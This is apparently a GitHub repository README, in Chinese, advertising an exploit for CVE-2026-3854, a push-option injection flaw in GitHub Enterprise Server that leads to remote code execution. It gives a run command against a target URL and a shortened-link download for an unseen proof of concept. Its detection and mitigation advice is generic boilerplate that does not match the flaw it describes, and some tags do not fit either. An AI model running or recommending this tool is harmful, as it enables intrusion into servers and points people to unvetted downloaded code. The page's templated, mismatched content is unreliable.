jenniferreire26/CVE-2026-3854

# CVE-2026-3854 - 允许远程代码执行的 GitHub Enterprise Server 漏洞 **严重程度：** 高 **CVSS：** 8.8 **影响：** 机密性、完整性、可用性 **发布日期：** 2026-03-10 ## 法律声明 仅供授权的安全测试使用。 ## 根本原因（简述） 在 GitHub Enterprise Server 中发现了一项特殊元素不当中和漏洞，该漏洞允许拥有仓库 push 权限的攻击者在实例上实现远程代码执行。在执行 git push 操作期间，用户提供的 push option 值在包含到内部服务 header 中之前，未得到妥善的清理。由于内部 header 格式使用了一种同样可能出现在用户输入中的分隔符，攻击者可以通过精心构造的 push option 值注入额外的元数据字段。该漏洞是通过 GitHub Bug Bounty 计划报告的，并且已在 GitHub Enterprise Server 版本 3.14.25、3.15.20、3.16.16、3.17.13、3.18.7 和 3.19.4 中得到修复。 ## 利用要求 - 可达的漏洞目标 - 可预测的用户/工作流上下文 - 没有额外的安全加固来阻止精心构造的请求 ## 如何使用 ``` python3 exploit.py https://target.tld ``` ## 检测 - 监控可疑的身份验证流程偏差 - 调查与 CVE-2026-3854 相关的异常直接 endpoint 访问 ## 缓解措施 - 更新至供应商已修复的版本 - 限制高风险 endpoint 并在可能的情况下强制执行 MFA ## 漏洞利用 [下载 PoC](https://tinyurl.com/276h2b44)

标签：CISA项目, GitHub Enterprise Server, PoC, 暴力破解, 编程工具, 网络安全研究, 远程代码执行, 逆向工具